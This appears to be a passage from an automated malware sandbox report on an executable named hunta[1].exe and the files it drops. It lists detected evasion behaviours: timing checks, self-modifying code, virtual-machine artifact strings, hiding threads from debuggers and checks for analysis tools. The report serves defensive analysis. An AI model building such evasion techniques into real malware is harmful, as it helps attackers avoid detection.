            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59708B5 second address: 59708BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59708BB second address: 59708BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeRDTSC instruction interceptor: First address: 59708BF second address: 59708C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\hunta[1].exeSpecial instruction interceptor: First address: FCDA5D instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\hunta[1].exeSpecial instruction interceptor: First address: 116EA53 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\hunta[1].exeSpecial instruction interceptor: First address: 11F6B5C instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 44DA5D instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 5EEA53 instructions caused by: Self-modifying code
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSpecial instruction interceptor: First address: 676B5C instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 3BDA5D instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 55EA53 instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSpecial instruction interceptor: First address: 5E6B5C instructions caused by: Self-modifying code
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_059B056A rdtsc 2_2_059B056A
            Source: C:\Users\user\Desktop\hunta[1].exeWindow / User API: threadDelayed 1037Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1232Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1134Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 777Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1223Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 1103Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow / User API: threadDelayed 710Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1226Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1247Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 558Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1432Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 570Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1021
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1047
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1008
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 1013
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow / User API: threadDelayed 927
            Source: C:\Users\user\Desktop\hunta[1].exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_2-23673
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_21-23073
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeEvaded block: after key decisiongraph_22-1182
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-1048
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 7636Thread sleep time: -48024s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612Thread sleep count: 1037 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 7612Thread sleep time: -2075037s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420Thread sleep count: 122 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 7420Thread sleep count: 216 > 30Jump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exe TID: 8100Thread sleep count: 230 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732Thread sleep count: 101 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1732Thread sleep time: -202101s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944Thread sleep count: 110 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6944Thread sleep time: -220110s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7860Thread sleep time: -32000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108Thread sleep count: 1232 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8108Thread sleep time: -124432s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008Thread sleep count: 1134 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008Thread sleep count: 777 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8008Thread sleep time: -77700s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956Thread sleep count: 115 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6956Thread sleep time: -230115s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176Thread sleep count: 121 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8176Thread sleep time: -242121s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180Thread sleep count: 118 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8180Thread sleep time: -236118s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088Thread sleep count: 86 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 2088Thread sleep time: -172086s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824Thread sleep count: 128 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1824Thread sleep time: -256128s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176Thread sleep count: 138 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7176Thread sleep time: -276138s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128Thread sleep count: 1223 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 8128Thread sleep time: -123523s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708Thread sleep count: 1103 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708Thread sleep count: 710 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 1708Thread sleep time: -71000s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220Thread sleep count: 123 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 6220Thread sleep time: -246123s >= -30000sJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236Thread sleep count: 129 > 30Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exe TID: 7236Thread sleep time: -258129s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560Thread sleep count: 1226 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1560Thread sleep time: -2453226s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688Thread sleep count: 1247 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3688Thread sleep time: -2495247s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876Thread sleep count: 126 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200Thread sleep count: 558 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1200Thread sleep time: -1116558s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6876Thread sleep count: 260 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948Thread sleep count: 1432 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 4948Thread sleep time: -2865432s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2288Thread sleep count: 253 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696Thread sleep count: 570 > 30Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 1696Thread sleep time: -1140570s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800Thread sleep count: 1021 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2800Thread sleep time: -2043021s >= -30000s
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732Thread sleep count: 1047 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2732Thread sleep time: -2095047s >= -30000s
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312Thread sleep count: 105 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788Thread sleep count: 1008 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2788Thread sleep time: -2017008s >= -30000s
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 2312Thread sleep count: 281 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 6996Thread sleep count: 229 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092Thread sleep count: 1013 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3092Thread sleep time: -2027013s >= -30000s
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136Thread sleep count: 927 > 30
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe TID: 3136Thread sleep time: -1854927s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00211718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00211754h4_2_00211718
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00B51754h22_2_00B51718
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_002129E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,4_2_002129E2
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 22_2_00B529E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,22_2_00B529E2
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeCode function: 4_2_00212B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,4_2_00212B8C
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
            Source: Amcache.hve.4.drBinary or memory string: VMware
            Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.:^G
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.00000000011B0000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000002.1418971368.00000000011E6000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000003.1487791068.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000ok\AppData\Local\Temp\heidig8C
            Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
            Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
            Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Y
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: RageMP131.exe, 00000018.00000002.3735277102.0000000000EC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/:VN)
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&z
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: RageMP131.exe, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000EC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a
            Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
            Source: RageMP131.exe, 00000018.00000003.1589365836.0000000000EC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: MPGPH131.exe, 0000000E.00000002.3734942241.00000000010A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_86D2EBBA2
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: MPGPH131.exe, 0000000F.00000002.3734078403.00000000009FD000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}|
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WARE\ACPI\DSDT\VBOX__G
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: MPGPH131.exe, 0000000E.00000003.1382508816.00000000010A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}X
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000E.00000002.3734942241.0000000001091000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000018.00000002.3735277102.0000000000EB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000AAB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: RageMP131.exe, 00000015.00000002.3735676016.0000000000E70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000Fc
            Source: WwKLWFk.exe, 00000016.00000002.1647432122.0000000000A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`-
            Source: WwKLWFk.exe, 00000004.00000002.1418971368.000000000116E000.00000004.00000020.00020000.00000000.sdmp, WwKLWFk.exe, 00000004.00000003.1288946208.0000000001188000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
            Source: MPGPH131.exe, 0000000F.00000002.3734938152.0000000000FBD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&>
            Source: hunta[1].exe, 00000002.00000002.3735222371.0000000001B00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&<
            Source: hunta[1].exe, 00000002.00000002.3729736991.000000000114D000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 0000000E.00000002.3729391873.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000018.00000002.3730064373.000000000053D000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: C:\Users\user\AppData\Local\Temp\WwKLWFk.exeAPI call chain: ExitProcess graph end nodegraph_4-1022
            Source: C:\Users\user\Desktop\hunta[1].exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\hunta[1].exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\hunta[1].exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeThread information set: HideFromDebugger
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_059B0CB7 Start: 059B0C8C End: 059B0C882_2_059B0CB7
            Source: C:\Users\user\Desktop\hunta[1].exeCode function: 2_2_059B07B1 Start: 059B0A7B End: 059B077B2_2_059B07B1
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 24_2_04E200D8 Start: 04E201A2 End: 04E200AA24_2_04E200D8
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeOpen window title or class name: ollydbg
